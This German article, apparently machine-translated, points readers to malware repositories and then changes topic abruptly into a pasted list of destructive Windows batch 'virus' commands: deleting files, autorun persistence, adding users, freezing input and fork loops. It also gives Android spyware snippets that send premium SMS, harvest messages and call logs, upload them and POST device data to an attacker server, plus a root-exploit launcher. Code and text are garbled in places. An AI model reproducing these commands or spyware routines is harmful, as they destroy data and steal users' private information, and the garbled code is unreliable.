Wo kann ich Virenbeispiele mit Quellcode und detaillierten Beschreibungen herunterladen?

Es ist keine leichte Aufgabe, eine Sammlung aktueller Viren zu finden, insbesondere mit einer Beschreibung und einem Quellcode. Wir haben bereits angegeben, wo analysiert und studiert werden soll. Heute werde ich Ihnen von einer weiteren Quelle erzählen, die Sie finden und herunterladen können, diesmal jedoch nicht nur im Netzwerk gefundene Malware, sondern auch ausführbare Dateien und Quellcodes von Viren mit detaillierten Informationen.

In diesem Artikel erfahren Sie mehr über einige interessante Projekte, mit denen Sie in die Welt des Quellcodes aller Arten von Trojanern, Botnetzen, Stealern, Würmern usw. eintauchen können.

• Vorwort
• Virusquellen
• TheZoo-Projekt
• Malware-Projekt

Warum und wer benötigt möglicherweise Virusproben?

Ausführbare Dateien und Virenquellen können erforderlich sein, um die von Malware verwendeten Technologien zu analysieren, das Verhalten von Viren im System zu untersuchen (Überwachung des Dateisystems, der Prozesse) und Antivirenprogramme zu testen. Mitarbeiter von Antiviren-Unternehmen sind bereit, Geld zu zahlen, um den Quellcode für einen neuen Virus zu erhalten.

Ist es legal, Viren herunterzuladen?

Sie können Beispiele von Viren zum Studieren und Analysieren auf Ihren Computer herunterladen, aber Sie können andere nicht mit ihnen verbreiten und infizieren. Mehr dazu in Artikel 273 des Strafgesetzbuches der Russischen Föderation.

Der Zweck dieser Projekte ist es, Spezialisten von Antiviren-Unternehmen und Personen, die an einer Virenanalyse interessiert sind, die Struktur des Schadcodees von Malware zu vermitteln.

Beachtung! Bitte beachten Sie, dass die heruntergeladenen Dateien Viren sind. Einige von ihnen werden versuchen, Ihren Computer zu infizieren. Führen Sie die heruntergeladenen Dateien niemals auf Ihrem Primärcomputer aus. Ich empfehle auch nicht, Virenbeispiele ohne umfassende Kenntnisse der Malware-Analyse herunterzuladen.

In jedem Fall übernimmt die Website www.site keine Verantwortung für Schäden, die Sie an Ihren eigenen Computern und den Computern anderer Personen verursachen.

Ich kann die Verwendung nur empfehlen. Vergessen Sie nicht böswillige Würmer, die versuchen, sich zu verbreiten und aus der virtuellen Maschine zu entkommen. Um dies zu vermeiden, empfehle ich, alle VM-Gastzugaben, den Netzwerkzugriff usw. zu deaktivieren. Wie das geht, erfahren Sie unter dem obigen Link.

Virusquellen: theZoo Project

Beginnen wir unsere Rezension mit dem Projekt theZoo, das als Zoo übersetzt wird (mit Humor geht es den Autoren gut). Es befindet sich im Githab-Repository.

Ziel des Projekts ist es, die Untersuchung von Viren verfügbar zu machen. Die Autoren sammeln und aktualisieren die Virendatenbank. Mit Hilfe von theZoo können Sie auf beliebte Malware-Beispiele zugreifen.

Virusproben: TheZoo-Projekt

Sowohl die ausführbare Datei als auch der Quellcode werden zum Herunterladen und Studieren angeboten.

Wie benutze ich den Zoo?

Sie können das theZoo-Projekt auf verschiedene Arten verwenden: direkt von der Site oder mithilfe eines Frameworks. Wir werden beide Wege abdecken. Beginnen wir mit dem ersten.

Gehen Sie also zur Site und sehen Sie sich mehrere Verzeichnisse und Dateien an.

Ausführbare Virendateien sind im Verzeichnis:

theZoo / malwares / Binaries /

Darin finden Sie die ausführbare Datei mit Viren. Für jede einzelne Malware - ein separates Verzeichnis mit 4 Dateien: die Malware selbst in verschlüsselter Form in einem ZIP-Archiv, SHA256 und MD5 - Archivprüfsummen zum Vergleich und ein Kennwort für das verschlüsselte Archiv.

Ausführbare Virendateien: Androrat-Trojaner

Quellcode von Viren sind im Verzeichnis:

theZoo / Malware / Quelle / Original /

Jedes Verzeichnis enthält vier ähnliche Dateien. Alles ist das gleiche wie bei ausführbaren Dateien.

Virusquellen: Trojaner Dendroid

Es gibt Hilfe für jedes einzelne Beispiel, aber um die Hilfe nutzen zu können, müssen Sie ein Framework installieren.

Verwenden Sie den folgenden Befehl, um das theZoo-Framework zu installieren:

git-Klon https://github.com/ytisf/theZoo

Anforderungen: urllib2, python3

Befehle: suchen, verwenden, abrufen, info, alle auflisten, report-mal, update-db, exit. Weitere Informationen zu Befehlen erhalten Sie mit dem Hilfebefehl.

Wir haben uns also mit diesem Projekt befasst, jetzt werden wir ein anderes in Betracht ziehen.

Virusbeispiele: Malware-Projekt

Das Malware-Projekt wird auch auf Githab gehostet. Die Auswahl an Viren ist nicht so groß wie im Zoo, wird aber häufiger aktualisiert. Unter einer kleinen Anzahl von Schadprogrammen finden Sie den Quellcode für Trojaner, Botnets, Ransomware, Passwortdiebstahler und andere "gute".

Hier ist die Liste bis heute:

• Alina Spark (Trojaner)
• Bleeding Life 2 (Expolit Packung)
• Carberp (Botnet)
• Carberp (Banking-Trojaner)
• Crimepack 3.1.3 (Exploit Pack)
• Dendroid (Trojaner für Android)
• Dexter v2 (Trojaner)
• Eda2, Stolich, Win32.Stolich (Ransomware)
• FlexiSpy (Spyware)
• (Rahmen)
• GMBot (Android-Trojaner)
• Gozi-ISFB - (Banking-Trojaner)
• Grum (Spam-Bot)
• Hacking Team RCS ()
• Versteckte Träne (Ransomware)
• KINS (Banking-Trojaner)
• Mirai (IoT Botnet)
• Pony 2.0 (Passwort Styler)
• PowerLoader (Botnet)
• RIG Frontend (Exploit Pack)
• Rovnix (Bootkit)
• Tinba (Bankentrojaner)
• TinyNuke (Banking-Trojaner)
• Trochilus, RedLeaves (RAT)
• Zeus (Bankentrojaner)

Virenquellcode: Malware-Projekt

Gehen wir zum Beispiel zum Ordner Alina Trojan. Hier werden uns mehrere Verzeichnisse angeboten, unter denen es Quellen gibt. Darüber hinaus haben die Autoren im unteren Teil Links zu Informationen im Zusammenhang mit der Malware hinzugefügt.

hier sind die Anweisungen für die Befehle
assoc .exe \u003d .mp3-Executors laufen als Musiklabel E: pridurok-ändern Sie die Schraube auf eine Idiotenzeit 00: 00-Änderungszeit
datum 13.03.36-Ändern Sie das Datum Assoc .lnk \u003d .txt-Ändern Sie die Beschriftungen in der TXT-Datei Kopie% 0 F: \\ Work.bat-Kopieren Sie das Objekt

1) Ein Programm zum Löschen und Umbenennen von Dateien von einem USB-Stick (falls vorhanden).
del F: \\ *. * / q
etikett F: HACK
2) Ein Programm zum Ändern von Datum und Uhrzeit auf einem Computer und zum Kopieren auf das Laufwerk C und auf ein USB-Flash-Laufwerk.
zeit 14:13
datum 11.07.12
kopieren Sie% 0 C: \\ Time.bat
kopieren Sie% 0 F: \\ Time.bat
----------
\u003e Befehl nul-hide line
% SystemRoot% / system32 / rundll32 user32, SwapMouseButton - tauscht die Maustasten aus
---------------
kopieren Sie ""% 0 "" "% SystemRoot% \\ system32 \\ File.bat"
registrieren Sie "HKLM \\ SOFTWARE \\ Microsoft \\ Windows \\ CurrentVersion \\ Run" / v "Datei" / t REG_SZ / d "% SystemRoot% \\ system32 \\ File.bat" / f
registrieren Sie HKCU \\ Software \\ Microsoft \\ Windows \\ CurrentVersion \\ Policies \\ Explorer / v NoControlPanel / t REG_DWORD / d 1 / f
Ein sehr grausamer Befehl: Fügt das Programm zum Start des Betriebssystems hinzu.
"Del x: \\ y *. * / Q" - löscht alle Dateien auf Datenträger x in Ordner y (außer Ordnern) (Beispiel del F: \\ Data *. * / Q);
"Net user" x "/ add" - fügt dem Computer einen Benutzer mit dem Namen x hinzu (Beispiel net user "Smoked" / add);
"@Echo off" wird am Anfang unseres Virus eingegeben und verbirgt alles
rundll32 user, disableoemlayer - Systemabsturz (!) - Deaktiviere alle E / A-Funktionen (Tastatur, Display, Maus). Das Ergebnis ist ein schwarzer Bildschirm mit einem Cursor und einem nicht reagierenden System. Windows funktioniert jedoch weiterhin.
del *. * / q (nach dem Ausführen dieses Befehls werden alle Dateien außer den Ordnern, die sich in dem Ordner befanden, in dem der Virus gestartet wurde, gelöscht !!!
md 1-Ordner erstellen
Um die Datei während des Windows-Starts auszuführen, benennen Sie sie in Autoexec.bat um
Echo Virus Loading-Inschrift auf dem Bildschirm Lodin Virus
del c: Programme / q (entfernt alle Dateien aus diesem Ordner)
reg - direkte Arbeit mit der Registrierung. Watch reg /? jeder!
rcp - Dateiaustausch über rcp in ascii
runas - im Namen des Benutzers
aufgabenliste - Zeigt die damit verbundenen Anwendungen und Sitzungen an.
taskkill - Ermöglicht das Beenden eines oder mehrerer Prozesse
tftp - trivial ftp
tskill - töte einen Prozess
reg - Dienstprogramm für die Interaktion mit der Registrierung
bootcfg - boot.ini Einstellung
anhängen - Ermöglicht das Öffnen von Remote-Dateien, als wären sie in der aktuellen.
getmac - hol mas
abmelden - Endbenutzersitzung.
mem - Informationen zu den aktuellen Prozessen im RAM anzeigen
mqbkup - Archivierung
netsh - ??
openfiles - Offene Dateien anzeigen.
rsh - Befehle auf Remote-Hosts ausführen, auf denen rsh ausgeführt wird
sc - Kommandozeile ??
rexec - Befehle auf Remote-Hosts ausführen, während rexec ausgeführt wird
herunterfahren - Herunterfahren (hehe) lokaler oder entfernter Computer.
systeminfo - Zeigt Informationen zum Computer an.
schtasks ist ein Taskplaner.
xcopy - Dateien und Verzeichnisse kopieren.
tsshutdn - Herunterfahren des Servers in der vorgeschriebenen Reihenfolge.
set - Umgebungsvariablen cmd.exe anzeigen, festlegen und entfernen. Systemeigenschaften (pr.kn. "mein Computer") - optional - Umgebungsvariablen. Nicht alle Variablen sind da, aber viele! Alle sehen einfach so aus.
Übrigens, hier sind einige RunDLL-Befehle, mit denen Batch-Dateien erstellt werden können

rundll32 Benutzer, wnetdisconnectdialog
Aufruf des Fensters "Netzlaufwerk trennen"

rundll32 user, disableoemlayer
Nicht provozieren

rundll32 Benutzer, Repaintscreen
Update (wie)

rundll32 Benutzer, setcursorpos
Mauszeiger nach links bis zum Pflanzen

rundll32 diskcopy, DiskCopyRunDll
Fenster "Copy Disk" -Aufruf

rundll32 rnaui.dll, RnaWizard / 1
Dialog "Verbindung herstellen" Aufruf (/ 1 \u003d ohne Fenster)

rundll32 Shell, Shellexecute
Explorer-Fenster im Stammverzeichnis geöffnet

rundll32 shell32, OpenAs_RunDLL
Der Fensteraufruf "Öffnen mit ..." ***

rundll32 shell32, SHFormatDrive
Aufruf des Fensters "Format: Disk3,5 (A)"

rundll32 shell32, ShellAboutA
Info-Box (über Windows) aufrufen

rundll32 shell32, SHExitWindowsEx 0
Starten Sie Windows 98 neu (ohne autoexec.bat usw.)

rundll32 shell32, SHExitWindowsEx 1
Beenden Sie die Arbeit mit Windows 98

rundll32 shell32, SHExitWindowsEx 2
Windows-98-PC-Start

rundll32 shell32, SHExitWindowsEx -1
Windows-98-Explorer neu starten

rundll32 shell32, Control_RunDLL
Öffnen Sie das Fenster "Systemsteuerung"

rundll32 shell32, Control_RunDLL desktop.cpl
Öffnen Sie "Bildschirmeigenschaften"

rundll32 shell32, Control_RunDLL main.cpl
Öffnen Sie das Modul Control Panel von MAIN.CPL **

rundll32 krnl386.exe, exitkernel
beenden Sie Windows ohne Nachrichten / Fragen

rundll32 Benutzer, swapmousebutton
Maustasten "verschieben" *

rundll32 Tastatur, deaktivieren
Tastaturtyp "Deaktivieren" *

rundll32 Maus, deaktivieren
Maus "deaktivieren" *

rundll rnaui.dll, RnaDial "Anbieter"
Rufen Sie das Fenster "Verbindung herstellen" mit dem Namen "Anbieter" auf.

rundll32 user, tilechildwindows
bauen Sie alle nicht gerollten Fenster von oben nach unten

rundll32 user, cascadechildwindows
bauen Sie alle nicht gerollten Fenster in einer Kaskade

rundll32 sysdm.cpl, InstallDevice_Rundll
(einzige Option in W98) Installieren Sie Hardware ohne Plug & Play

rundll32 msprint2.dll, RUNDLL_PrintTestPage
wählen Sie im angezeigten Menü einen Drucker aus und senden Sie einen Test an ihn

rundll32 Benutzer, setcaretblinktime
neue Frequenz blinkender Flüche einstellen *

rundll32 Benutzer, setdoubleclicktime
neue Doppelklickgeschwindigkeit einstellen *

rundll32 setupx.dll, InstallHinfSection
DefaultInstall 130; C: \\ file.inf
systemneustartfenster. Jetzt spielen? ъ Ja / Nein ъ ”****

ASSOC - Zeigt Dateierweiterungszuordnungen an oder ändert sie
AT - Plant Befehle und Programme für die Ausführung auf dem Computer.
ATTRIB - Zeigt oder ändert Dateiattribute.
BREAK - Setzt oder bricht die Kombinationsprüfung ab.
CACLS - Zeigt Zugriffssteuerungslisten (ACLs) für Dateien an oder ändert sie.
CALL - Ruft eine * .BAT-Datei von einer anderen auf.
CD - Zeigt den Namen an oder ändert den Namen des aktuellen Verzeichnisses.
CHCP - Zeigt die aktive Codepage-Nummer an oder legt sie fest.
CHDIR - Zeigt den Namen an oder ändert den Namen des aktuellen Verzeichnisses.
CHKDSK - Überprüft die Festplatte und zeigt einen Statusbericht an.
CLS - Löscht den Bildschirm.
CMD - Startet eine neue Instanz des Windows NT-Befehlsinterpreters.
FARBE - Legt die Standardfarben für den Vordergrund und den Hintergrund der Konsole fest.
BEFEHL - Startet eine neue Kopie des Windows-Befehlsinterpreters.
COMP - Vergleicht den Inhalt von zwei Dateien oder festgelegten Dateien.
KOMPAKT - Zeigt die Dateikomprimierung unter Windows NT (NTFS) an.
CONVERT - Konvertiert FAT-Volumes in das NTFS-Format (Windows NT File System). Sie können die aktuelle Disc nicht konvertieren.
KOPIEREN - Kopiert eine oder mehrere Dateien an einen anderen Speicherort.
CTTY - Ändert das Endgerät, mit dem Sie Ihr System steuern.
DATE - Zeigt das Datum an oder legt es fest.
DEL - Löscht eine oder mehrere Dateien.
DEBUG - Führt Debugging-, Testprogramme und Bearbeitungstools durch.
DIR - Zeigt eine Liste der Dateien und Unterverzeichnisse in einem Verzeichnis an.
DISKCOMP - Vergleicht den Inhalt von zwei Disketten.
DISKCOPY - Kopiert den Inhalt einer Diskette auf eine andere.
DOSKEY - Bearbeitet Befehlszeilen, erstellt Windows-Befehle neu und erstellt ein Makro.
ECHO - Zeigt Nachrichten an oder aktiviert / deaktiviert die Befehlsausgabe.
EMM386 - Aktiviert / deaktiviert die Unterstützung für erweiterten EMM386-Speicher.
ENDLOCAL - Beendet die Lokalisierung von Umgebungsänderungen in einer * .BAT-Datei.
ERASE - Löscht eine oder mehrere Dateien.
EXIT - Beendet die Programmausführung (Befehlsinterpreter).
EXTRACT - Tool zum Extrahieren von Informationen aus CAB-Dateien.
FC - Vergleicht zwei Dateien oder Dateieinstellungen und zeigt den Unterschied zwischen ihnen an.
FIND - Sucht nach einer Textzeichenfolge in einer Datei oder in Dateien.
FINDSTR - Suche nach Zeichenfolgen in Dateien.
FOR - Führt den angegebenen Befehl für jede Datei in einer Reihe von Dateien aus.
FORMAT - Formatiert eine Festplatte zur Verwendung mit Windows.
FTYPE - Zeigt oder ändert die in Erweiterungslinks verwendeten Dateitypen.
GOTO - Leitet den Windows NT-Befehlsinterpreter auf die markierte Zeile in der * .BAT-Datei.
GRAFTABL - Die Fähigkeit von Windows, pseudografische Symbole anzuzeigen, die im grafischen Modus eingefügt wurden.
HILFE - Bietet Hilfeinformationen für Windows-Befehle.
IF - Führt die Verarbeitung einer Bedingung in einer * .BAT-Datei durch.
KEYB - Konfiguriert die Tastatur für die angegebene Sprache.
LABEL - Erstellt, ändert oder entfernt eine Datenträgerbezeichnung auf einer Festplatte.
LOADHIGH (LH) - Lädt das Programm auf Adressen mit hohem Speicher.
MD - Erstellt ein Verzeichnis.
MEM - Zeigt die Menge des verwendeten und freien Speichers auf Ihrem System an.
MKDIR - Erstellt ein Verzeichnis.
MODE - Konfiguriert das Systemgerät.
MEHR - Zeigt die Ausgabe jeweils für einen Bildschirm an.
MOVE - Verschiebt eine oder mehrere Dateien von einem Verzeichnis in ein anderes auf derselben Festplatte.
NETSTAT - Zeigt Statistiken für Protokolle und aktuelle TCP / IP-Netzwerkverbindungen an.
NLSFUNC - Lädt länderspezifische Informationen.
PATH - Zeigt den Suchpfad für ausführbare Dateien an oder legt diesen fest.
PAUSE - Unterbricht die Verarbeitung der * .BAT-Datei und zeigt eine Meldung an.
POPD - Stellt den vorherigen Wert des von PUSHD gespeicherten aktuellen Verzeichnisses wieder her.
DRUCKEN - Druckt eine Textdatei.
PROMPT - Ändert die Windows-Eingabeaufforderung.
PUSHD - Speichert das aktuelle Verzeichnis und ändert es dann.
RD - Entfernt ein Verzeichnis.
RECOVER - Stellt lesbare Informationen von einer fehlerhaften oder defekten Festplatte wieder her.
REM - Schreibt Kommentare (Notizen) in * .BAT-Dateien oder CONFIG.SYS.
REN - Benennen Sie die Datei oder Dateien um.
RENAME - Benennen Sie die Datei oder Dateien um.
ERSETZEN - Ersetzt Dateien.
RESTORE - Stellt Dateien wieder her, die mit dem Befehl BACKUP archiviert wurden.
RMDIR - Entfernt ein Verzeichnis.
SET - Zeigt Windows-Umgebungsvariablen an, legt sie fest oder entfernt sie.
SETLOCAL - Startet die Lokalisierung von Umgebungsänderungen in einer * .BAT-Datei.
SETVER - Legt die MS-DOS-Versionsnummer fest, die Windows dem Programm mitteilt.
SHIFT - Verschiebt die Position der ersetzten Parameter in der * .BAT-Datei.
SMARTDRV - Installiert und konfiguriert das SMART Drive Caching Utility.
SORTIEREN - Sortiert den Eingabestream.
START - Startet ein separates Fenster zum Ausführen des angegebenen Programms oder Befehls.
SUBST - Ordnet einen Pfad einem Laufwerksbuchstaben zu.
SYS - Kopiert die MS-DOS-Systemdateien und den Befehlsinterpreter auf das von Ihnen angegebene Laufwerk.
ZEIT - Zeigt die Systemzeit an oder stellt sie ein.
TITEL - Legt den Fenstertitel für die Sitzung fest.
TREE - Zeigt grafisch die Verzeichnisstruktur des Laufwerks oder Pfads an.
TYP - Zeigt den Inhalt einer Textdatei an.
VER - Zeigt die Windows-Version an.
PRÜFEN - Weist Windows an, ob überprüft werden soll, ob die Dateien korrekt auf die Festplatte geschrieben wurden.
VOL - Zeigt das Etikett des Datenträgervolumens und die Seriennummer an.
XCOPY - Kopiert Dateien und Verzeichnisbäume.

Nun, wenn Sie Windows "töten" wollen, dann:
@echo aus
starten Sie den Explorer
starten Sie den Explorer
starten Sie den Explorer
starten Sie den Explorer - wiederholen Sie 100 erneut und schreiben Sie in das automatische Laden.

Einige Antivirenlabors haben bereits über 10 Millionen Beispiele in ihrer Sammlung bösartiger Android-Apps. Diese Zahl regt die Fantasie an, aber ungefähr 9 Millionen 995 Tausend von ihnen sind umbenannte Kopien der ursprünglichen Viren. Wenn Sie jedoch den Quellcode der verbleibenden mehreren tausend Malware-Beispiele analysieren, werden Sie feststellen, dass sie alle aus einer kleinen Anzahl eindeutiger Funktionsblöcke (mehrere modifiziert und auf unterschiedliche Weise kombiniert) kombiniert werden.

Die Sache ist, dass Virmaker am häufigsten sehr triviale Aufgaben verfolgen:

• eine SMS an eine bezahlte Nummer senden;
• die vertraulichen Informationen des Benutzers (Telefonnummern, Nachrichtentexte, Daten von einer SD-Karte usw.) in Besitz nehmen;
• daten über das infizierte Gerät sammeln;
• besitz von Administratorrechten auf dem Gerät (um Anwendungen ohne die Erlaubnis des Besitzers zu installieren oder das Gerät böswillig zu deaktivieren);
• verfolgen Sie Anmeldungen, Kennwörter und Zahlungskartendaten, die der Benutzer auf den Websites von Internetbanking-Systemen eingibt. Wie machen Sie das? Lassen Sie uns versuchen, in die düstere Welt des mobilen Wyrmaking einzutreten und zu sehen, was dort passiert.

SMS senden

Wer benutzt:

• AdSms;
• FakePlayer;
• HippoSms.

Die häufigste Art von Viren sind SMS-Trojaner. Diese Viren senden einfach ohne Zustimmung des Benutzers Nachrichten zu Premium-Tarifen. Es ist ganz einfach, ein solches Programm zu erstellen oder ein fertiges Programm für die gewünschte Nummer neu zu schreiben. Und der Prozess des Erhaltens von Vorteilen ist extrem vereinfacht - im Gegensatz zum Beispiel zum Verfolgen von Bankdaten.

Das Folgende ist das einfachste Beispiel für Code. Dies ist die Grundfunktion zum Senden von SMS. Dies kann kompliziert sein, indem Sie den Sendestatus überprüfen, je nach Standort des Teilnehmers Nummern auswählen und dann die SMS löschen.

Private statische SendSms (String DestNumber, String SmsText) (// Versuch, die sendTextMessage-Methode des SmsManager-Objekts (Standardprogramm zum Senden von SMS vom aktuellen Gerät) mit der Mindestanzahl von Parametern auszuführen: Empfängernummer und Nachrichtentext try (SmsManager.getDefault (). SendTextMessage (DestNumber) , , SmsText, , null); return true;))

Wo finde ich den Virencode?

In den allermeisten Fällen wird das Telefon durch die Installation von Anwendungen infiziert. Jede Android-Anwendung existiert als Datei mit der Erweiterung apk, bei der es sich tatsächlich um ein Archiv handelt. Sie können den Inhalt mit dem Android SDK, dem APK to JAR Converter und dem Java Bytecode Decompiler anzeigen. Application Building (APK) besteht aus folgenden Teilen:

• resources.arsc - Ressourcentabelle;
• res (Ordner) - die tatsächlichen Ressourcen (Symbole usw.);
• META-INF (Ordner) - enthält Dateien mit folgendem Inhalt: Ressourcenprüfsummen, Anwendungszertifikat und Beschreibung der APK-Assembly;
• AndroidManifest.xml - alle Arten von Serviceinformationen. Einschließlich der Berechtigungen, die die Anwendung vor der Installation für den korrekten Betrieb anfordert;
• classes.dex - Sie haben wahrscheinlich gehört, dass unter Android-Betriebssystemen der gesamte Code mit der virtuellen Dalvik-Maschine ausgeführt wird (ab Version 4.4 wird ART-Unterstützung angezeigt), die den normalen Java-Bytecode nicht versteht. Daher gibt es Dateien mit der Erweiterung dex. Neben den erforderlichen und nützlichen Klassen (die für die Funktionalität der Anwendung verantwortlich sind) enthält sie auch bösartige Klassen (den in diesem Artikel analysierten Virencode).

Schreiben von Benutzerinformationen in eine Textdatei

Wer benutzt:

• NickySpy;
• SmsSpy.

Es gibt eine Kategorie von Viren, die nach persönlichen Daten von Benutzern suchen. Der Mechanismus ihrer Wirkung ist ebenfalls einfach. Sie laden entweder die Dateien des Benutzers auf den Server ihres Erstellers hoch oder sammeln alle Daten in txt vorab (CSV, XML - nicht unbedingt erforderlich). Von Interesse für Cyberkriminelle können Kontakte jeglicher Art, Nachrichten von verschiedenen Instant Messenger, Mediendateien usw. sein.

SMS von infizierten Benutzern sind besonders wertvoll für die Telefonnummern von Absendern und Empfängern - sie können verwendet werden, um die Datenbank für Spam-Mailings aufzufüllen. Viren dieser Art werden seltener verwendet, um Geräte bestimmter Personen zu infizieren. Wenn Ihre Freundin Sie das nächste Mal einlädt, eine an sie geschriebene Anwendung zu testen (ay, caramba! - Ed.), Verlieren Sie auf Android nicht Ihre Wachsamkeit :).

// Zähle die Anzahl der SMS auf dem Gerät arrayOfObject \u003d (Object) localBundle.get ("pdus"); int j \u003d arrayOfObject.length; // Durchlaufe jede SMS i \u003d 1 während (true) (if (i\u003e \u003d j) break; // Erstelle ein SMS-Objekt SmsMessage localSmsMessage \u003d SmsMessage.createFrompdu ((Byte) arrayOfObject [i]); // Put zum Variieren von Absendernummer, Text und Uhrzeit des SMS-Sendens String MessageNumber \u003d localSmsMessage.getOriginatingAddress (); String MessageText \u003d localSmsMessage.getDisplayMessageBody (); long l \u003d localSmsMessage.getTimestampMillis (); Date localDate \u003d Date (l); neues SimpleDateFormat ("JJJJ-MM-TT HH: MM: SS"). Format (localDate); // Bilden Sie aus den empfangenen Daten eine Zeichenfolge und schreiben Sie sie mit der WriteRec-Benutzermethode in eine Textdatei. String MessageInfo \u003d 7MessageNumber + "#" + MessageText + "#" + MessageTimeDate + ";" WriteRec (paramContext, "sms.txt", MessageInfo); // Zur nächsten Nachricht gehen i + \u003d 1;) Es ist auch praktisch, die Spam-Liste aus dem Anrufverlauf des Teilnehmers aufzufüllen. Dieser Code kann bei einem eingehenden Anruf ausgeführt werden: If (parmIntent.getAction (). Equals ("android.intent.action.NEW_OUTGOING_CALL")) // Geben Sie die Nummer des Teilnehmers in die Variable String phonenumber \u003d paramIntent.getStringExtra ("android.intent" ein. extra.PHONE_NUMBER "); // Bilde eine Zeichenfolge aus der Nummer und dem Datum des Aufrufs. String PhoneCallRecord \u003d Telefonnummer +" # "+ getSystemTime (); // Rufe die WriteRec () -Methode auf (ihr Code wird hier nicht angegeben), die einer Textdatei mit eine Zeile hinzufügt Anrufliste WriteRec (paramContext, "phonecall.txt", PhoneCallRecord);)

Nachdem die Informationen aufgeschrieben wurden, werden sie an die „rechten Hände“ weitergeleitet. Der folgende Code lädt die Anrufliste auf den Server herunter:

Private void uploadPhonecallHistory () löst eine IDException aus (while (true) (return; // Überprüfen Sie, ob die benötigte Datei vorhanden ist, wenn (! FileIsExists (/data/data/spyapp.pg/files/phonecall.txt ")) continue; // Erstellen Sie einen Objektdatei-Uploader UploadFiles localUploadFiles \u003d new UploadFiles (); String uploadkeynode \u003d getKeyNode ("uid", "uid_v"); // Führen Sie die.advanceduploadfile-Methode aus (der Code wird hier nicht angezeigt), um die Datei auf den Server des "virus maker" localUploadFiles hochzuladen. advanceduploadfile (uploadkeynode, "/ data / data / spyapp.pg / files / phonecall.txt");))

Sammlung von Informationen

Wer benutzt:

• DroidKungFu;
• DroidDream;
• die überwiegende Mehrheit aller ähnlichen Malware.

Grundsätzlich ist jeder Virenhersteller eine nützliche Information über Geräte, die mit seinen Programmen infiziert sind. Es ist sehr einfach, es zu bekommen. Ein Array wird mit Daten zu den Eigenschaften des Telefons erstellt (eine vollständige Liste finden Sie im Android-Entwicklerhandbuch) und als POST-Anforderung an ein PHP-Skript (die Sprache ist nicht prinzipiell) auf dem Server des Angreifers gesendet, das die Daten verarbeitet und zur späteren Verwendung in eine Datenbank stellt.

Private void reportState (int paramInt, string paramString) (// Ein Array erstellen und Serviceinformationen darin ablegen ArrayList UserInformation \u003d new ArrayList (); UserInformation.add (neues BasicNameValuePair ("imei", this.mImei)); UserInformation.add ( new BasicNameValuePair ("taskid", this.mTaskId)); UserInformation.add (new BasicNameValuePair ("state", Integer.toString (paramInt)); // Wenn die Funktion den Parameter "paramString (comment)" hat, fügen Sie ihn in das Array ein und sein if (paramStrng! \u003d null) && (! "". equals (paramString))) UserInformation.add (neues BasicNameValuePair ("comment", paramString)); // Eine HTTP-POST-Anforderung mit der Adresse des Skripts erstellen, das Daten sammelt HttpPost localHttpPost \u003d new HttpPost ("http://search.virusxxxdomain.com:8511/search/rtpy.php"); try (// Füge unser Datenarray zur Anfrage hinzu und führe es mit einem Standard-HTTP-Client aus localHttpPost.setEntity (neue UrlEncodeFormEntity (UserInformation, "UTF-8"))); new DefaultHttpClient (). execute (localHttpPost) .getStatusLine.getStatusCode (); Rückkehr; ))

Verwurzelung

Wer benutzt:

• DroidKungFu;
• DroidDream;
• RootSmart.

Eines der frustrierendsten Dinge, die einem Android-Gerät passieren können, ist das Rooten mit einem Virus. Danach kann das Schadprogramm alles damit anfangen: andere Viren installieren, die Hardwareeinstellungen ändern. Diese Aktion wird ausgeführt, indem nacheinander Exploits gestartet werden:

Private void RootFunc () (ApplicationInfo localApplicationInfo \u003d getApplicationInfo (); / * "ratc" ist eine Kopie des berühmten Root-Exploits "Rage Against The Cage". Kiall - Stoppt alle Prozesse, die von der aktuellen Anwendung gestartet wurden. Gjsvro - ein Exploit zum Erwerb von udev-Rechten (verwendet in Linux-Systeme für die erweiterte Arbeit mit Hardware- und Netzwerkschnittstellen). Kopieren Sie all dies an die richtige Stelle * / Utils.copyAssets (dies, "ratc", "/ data / data" + localApplicationInfo.packageName + "/ ratc"); Utils .copyAssets (dies, "killall", "/ data / data" + localApplicationInfo.packageName + "/ killall"); Utils.copyAssets (dies, "gjsvro", "/ data / data" + localApplicationInfo.packageName + "/ gjsvro "); // Und über die Befehlszeile ausführen Utils.oldrun (" / system / bin / chmod "," 4755 /data/data"+localApplicationInfo.packageName + "/ ratc"); Utils.oldrun ("/ system / bin / chmod "," 4755 /data/data"+localApplicationInfo.packageName + "/ killall"); Utils.oldrun ("/ system / bin / chmod", "4755 /data/data"+localApplicationInfo.packag eName + "/ gjsvro"); neues MyTread.start (); )

Websites über mobile Malware

Blog von Experten des Unternehmens Kasperskiy Lab Diese Ressource enthält hochwertige und detaillierte Artikel zu vielen Aspekten der Computersicherheit, einschließlich Android-Viren. Es lohnt sich, diese Seite regelmäßig zu besuchen, um über die neuesten Entwicklungen auf dem Laufenden zu bleiben.

Die Gruppe widmet sich einem Open-Source-Tool für alle Arten von Manipulationen mit dem Code von Android-Anwendungen (Dekompilierung und Änderung von DEX / ODEX / APK-Dateien usw.). Androguard enthält auch eine umfangreiche Datenbank mit Artikeln zu Viren. Neben kurzen Überprüfungen der Funktionalität und der Schutzmethoden gibt es detaillierte Analysen des Malware-Codes.

Abschnitt Mobile Bedrohungen unter www.fortiguard.com Enzyklopädie der Telefonviren. Jeder Artikel bietet einen Überblick über die Funktionalität und enthält zahlreiche technische Details. Neben Informationen zu Bedrohungen für das Android-Betriebssystem gibt es Artikel zu Viren für Symbian OS, iOS und andere Plattformen.

Virus Schutz

Einige Benutzer glauben, dass wenn Sie Anwendungen ausschließlich von Google Play herunterladen und ein Antivirenprogramm auf ihrem Smartphone installieren, dies 100% ige Sicherheit garantiert. Machen Sie sich nichts vor: Im Internet gibt es regelmäßig Nachrichten über Malware, die auf dem offiziellen Markt gefunden wird. Die Anzahl der neu auftretenden Schadprogramme wird in Hunderttausenden pro Monat gemessen, was es für sie schwierig macht, rechtzeitig in Antiviren-Datenbanken zu gelangen. Eine echte Sicherheitsgarantie kann durch manuelles Anzeigen des APK-Dateicodes vor der Installation auf dem Telefon gegeben werden. Sie müssen kein Kodierungsguru sein, um die bösartigen Fragmente zu erkennen. Und unser Artikel wird Ihnen dabei helfen.

Fazit

Wie aus den Beispielen hervorgeht, unterscheidet sich die mobile Verkabelung nicht in der technologischen Komplexität. Natürlich wurden diese Beispiele vereinfacht, um sie an das Protokollformat anzupassen. Zunächst fehlen Fehler- und Ausnahmebehandlungsroutinen sowie einige technische Details, deren Fehlen Sie nicht daran hindert, die Prinzipien der Android-Malware zu verstehen, sondern Sie vor unnötigen Experimenten schützt. Wir unterstützen die Entstehung von Viren nicht, oder? 🙂